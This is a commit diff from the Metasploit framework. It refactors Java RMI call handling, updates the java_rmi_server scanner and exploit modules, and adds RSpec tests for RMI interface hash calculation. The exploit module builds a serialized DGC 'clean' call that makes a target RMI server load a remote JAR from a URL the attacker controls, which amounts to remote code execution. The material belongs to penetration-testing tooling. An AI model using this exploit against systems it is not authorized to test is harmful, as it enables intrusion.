Add specs, plus modify java_rmi_server modules

2015-03-17 11:26:27 -05:00 · 2015-03-17 11:26:27 -05:00 · ebe7ad07b0
parent 0a37df67a0
commit ebe7ad07b0
4 changed files with 100 additions and 24 deletions
--- a/lib/msf/java/rmi/client/streams.rb
+++ b/lib/msf/java/rmi/client/streams.rb
@ -39,7 +39,7 @@ module Msf
          #   at the same time.
          # @option opts [Fixnum] :operation On JDK 1.1 stub protocol the operation index in the interface. On JDK 1.2
          #   it is -1.
-          # @option opts [Fixnum] :method_hash On JDK 1.1 stub protocol the stub's interface hash. On JDK1.2 is a hash
+          # @option opts [Fixnum] :hash On JDK 1.1 stub protocol the stub's interface hash. On JDK1.2 is a hash
          #   representing the method to call.
          # @option opts [Array] :arguments
          # @return [Rex::Proto::Rmi::Model::Call]
@ -50,7 +50,7 @@ module Msf
            uid_time = opts[:uid_time] ||  0
            uid_count = opts[:uid_count] || 0
            operation = opts[:operation] || -1
-            method_hash = opts[:method_hash] || 0
+            hash = opts[:hash] || 0
            arguments = opts[:arguments] || []

            block_data = Rex::Java::Serialization::Model::BlockData.new
@ -60,7 +60,7 @@ module Msf
              uid_time,
              uid_count,
              operation,
-              method_hash
+              hash
            ].pack('qlqslq')
            block_data.length = block_data.contents.length

--- a/modules/auxiliary/scanner/misc/java_rmi_server.rb
+++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb
@ -51,15 +51,14 @@ class Metasploit3 < Msf::Auxiliary
    jar = Rex::Text.rand_text_alpha(rand(8)+1) + '.jar'
    jar_url = "file:RMIClassLoaderSecurityTest/" + jar

-    print_status(calculate_interface_hash(
+    dgc_interface_hash = calculate_interface_hash(
      [
-        #{name: 'clean', descriptor: '([Ljava.rmi.server.ObjID;;J;Ljava.rmi.dgc.VMID;;Z)V'},
-        #{name: 'dirty', descriptor: '([Ljava.rmi.server.ObjID;;J;Ljava.rmi.dgc.Lease;)Ljava.rmi.dgc.Lease;'}
-        {name: 'sayHello', descriptor: '()Ljava/lang/String;'},
-        {name: 'sayHelloTwo', descriptor: '(Ljava/lang/String;)Ljava/lang/String;'}
+        {name: 'clean', descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/VMID;Z)V'},
+        {name: 'dirty', descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/Lease;)Ljava/rmi/dgc/Lease;'}
      ],
      ['java.rmi.RemoteException']
-    ).to_s)
+    )
+
    # JDK 1.1 stub protocol
    # Interface hash: 0xf6b6898d8bf28643 (sun.rmi.transport.DGCImpl_Stub)
    # Operation: 0 (public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean))
@ -69,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
      uid_time: 0,
      uid_count: 0,
      operation: 0,
-      method_hash: 0xf6b6898d8bf28643,
+      hash: dgc_interface_hash, # 0xf6b6898d8bf28643,
      arguments: build_dgc_clean_args(jar_url)
    )
    return_data = recv_return
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@ -126,7 +126,17 @@ class Metasploit3 < Msf::Exploit::Remote
    new_url = get_uri + '/' + jar

    print_status("#{peer} - Sending RMI Call...")
-    send_call(call_data: build_gc_call_data(new_url))
+    #send_call(call_data: build_gc_call_data(new_url))
+    send_call(
+      object_number: 2,
+      uid_number: 0,
+      uid_time: 0,
+      uid_count: 0,
+      operation: 0,
+      hash: 0xf6b6898d8bf28643, #dgc_interface_hash
+      arguments: build_dgc_clean_args(new_url)
+    )
+
    return_data = recv_return

    if return_data.nil? && !session_created?
@ -196,14 +206,8 @@ class Metasploit3 < Msf::Exploit::Remote
    false
  end

-  def build_gc_call_data(jar_url)
-    stream = Rex::Java::Serialization::Model::Stream.new
-
-    block_data = Rex::Java::Serialization::Model::BlockData.new
-    block_data.contents = "\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43"
-    block_data.length = block_data.contents.length
-
-    stream.contents << block_data
+  def build_dgc_clean_args(jar_url)
+    arguments = []

    new_array_annotation = Rex::Java::Serialization::Model::Annotation.new
    new_array_annotation.contents = [
@ -230,8 +234,8 @@ class Metasploit3 < Msf::Exploit::Remote
    new_array.values = []
    new_array.array_description = array_desc

-    stream.contents << new_array
-    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x00\x00\x00\x00\x00")
+    arguments << new_array
+    arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x00\x00\x00\x00\x00")

    new_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'metasploit.RMILoader')
@ -251,11 +255,11 @@ class Metasploit3 < Msf::Exploit::Remote
    new_object.class_desc.description = new_class_desc
    new_object.class_data = []

-    stream.contents << new_object
+    arguments << new_object

-    stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00")
+    arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00")

-    stream
+    arguments
  end

 end
--- a/spec/lib/msf/java/rmi/util_spec.rb
+++ b/spec/lib/msf/java/rmi/util_spec.rb
@ -0,0 +1,73 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/java/serialization'
+require 'msf/java/rmi/util'
+
+describe Msf::Java::Rmi::Util do
+  subject(:mod) do
+    mod = ::Msf::Exploit.new
+    mod.extend ::Msf::Java::Rmi::Util
+    mod.send(:initialize)
+    mod
+  end
+
+  let(:interface_methods) do
+    [
+      {name: 'sayHello', descriptor: '()Ljava/lang/String;'},
+      {name: 'sayHelloTwo', descriptor: '(Ljava/lang/String;)Ljava/lang/String;'}
+    ]
+  end
+
+  let(:interface_exceptions) do
+    ['java.rmi.RemoteException']
+  end
+
+  let(:interface_hash) do
+    0x3e664fcbd9e953bb
+  end
+
+  let(:method_signature) do
+    'sayHello()Ljava/lang/String;'
+  end
+
+  let(:method_hash) do
+    0x53e0822d3e3724df
+  end
+
+  let(:dgc_methods) do
+    [
+      {name: 'clean', descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/VMID;Z)V'},
+      {name: 'dirty', descriptor: '([Ljava/rmi/server/ObjID;JLjava/rmi/dgc/Lease;)Ljava/rmi/dgc/Lease;'}
+    ]
+  end
+
+  let(:dgc_exceptions) do
+    ['java.rmi.RemoteException']
+  end
+
+  let(:dgc_hash) do
+    0xf6b6898d8bf28643
+  end
+
+  describe "#calculate_interface_hash" do
+    context "when an example interface is provided" do
+      it "generates a correct interface hash" do
+        expect(mod.calculate_interface_hash(interface_methods, interface_exceptions)).to eq(interface_hash)
+      end
+    end
+
+    context "when a DGC interface is provided" do
+      it "generates a correct interface hash" do
+        expect(mod.calculate_interface_hash(dgc_methods, dgc_exceptions)).to eq(dgc_hash)
+      end
+    end
+  end
+
+  describe "#calculate_method_hash" do
+    it "generates a correct interface hash" do
+      expect(mod.calculate_method_hash(method_signature)).to eq(method_hash)
+    end
+  end
+end
+